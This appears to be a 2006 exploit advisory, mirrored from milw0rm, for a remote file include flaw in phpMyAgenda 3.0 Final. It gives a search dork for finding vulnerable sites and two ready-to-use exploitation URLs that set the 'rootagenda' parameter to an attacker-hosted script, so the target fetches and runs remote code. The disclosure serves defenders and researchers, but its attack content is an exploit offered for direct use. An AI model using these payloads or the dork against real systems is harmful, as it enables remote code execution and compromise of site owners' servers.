phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Vulnerability

🗓️ 30 Apr 2006 00:00:00Reported by RootType

phpMyAgenda <= 3.0 Final Remote File Include Vulnerability, Discovered by 'Aesthetico' at http://www.majorsecurity.d


                                                Title: phpMyAgenda &lt;=3.0 Final - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: phpMyAgenda
URL: http://phpmyagenda.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: &quot;Powered by phpMyAgenda&quot;
-----------------------------------------------------------------

Exploitation:

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?

# milw0rm.com [2006-04-30]

30 Apr 2006 00:00Current

7.1High risk

Vulners AI Score7.1

phpMyAgenda &lt;= 3.0 Final (rootagenda) Remote Include Vulnerability

phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Vulnerability